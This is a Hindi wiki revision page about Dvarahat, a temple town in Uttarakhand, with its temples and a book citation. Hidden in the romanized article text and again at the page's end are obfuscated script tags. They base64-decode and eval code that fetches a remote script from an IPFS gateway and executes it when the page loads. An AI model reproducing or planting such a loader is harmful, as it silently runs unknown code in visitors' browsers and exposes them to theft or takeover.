Difference between revisions of "द्वाराहाट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''द्वाराहाट''' [[रानीखेत]] तहसील, [[अल्मोड़ा ज़िला]], [[उत्तराखण्ड]] का एक प्राचीन स्थान है। यह रानीखेत से 3 मील {{मील|मील=3}} की दूरी पर स्थित है। 8वीं से 13वीं शती तक के अनेक मंदिरों के [[अवशेष]] यहाँ से मिले हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=460|url=}}</ref>
+
'''द्वाराहाट''' अथवा 'द्वारहाट' [[रानीखेत]] तहसील, [[अल्मोड़ा ज़िला]], [[उत्तराखण्ड]] का एक प्राचीन स्थान है। यह रानीखेत से 3 मील {{मील|मील=3}} की दूरी पर स्थित है। 8वीं से 13वीं शती तक के अनेक मंदिरों के [[अवशेष]] यहाँ से मिले हैं।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=460|url=}}</ref>
  
 
*द्वाराहाट में तीन वर्ग के मन्दिर हैं- कचहरी, मनिया तथा रत्नदेव। इसके अतिरिक्त बहुत-से मन्दिर प्रतिमाविहीन हैं।
 
*द्वाराहाट में तीन वर्ग के मन्दिर हैं- कचहरी, मनिया तथा रत्नदेव। इसके अतिरिक्त बहुत-से मन्दिर प्रतिमाविहीन हैं।

Revision as of 10:58, 3 June 2012

dvarahat athava 'dvarahat' ranikhet tahasil, almo da zila, uttarakhand ka ek prachin sthan hai. yah ranikhet se 3 mil (lagabhag 4.8 ki.mi.)<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> ki doori par sthit hai. 8vian se 13vian shati tak ke anek mandiroan ke avashesh yahaan se mile haian.[1]

  • dvarahat mean tin varg ke mandir haian- kachahari, maniya tatha ratnadev. isake atirikt bahut-se mandir pratimavihin haian.
  • 'goojaradev ka mandir' dvarahat ka sarvadhik mahattvapoorn mandir hai. kala ki drishti se yah mandir utkrisht kaha ja sakata hai.
  • is mandir ki charoan or ki bhittiyoan ko kalapoorn shilapattoan se samalankrit kiya gaya hai.
  • dvarahat ka 'shitala mandir' bhi bahut ullekhaniy hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 460 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>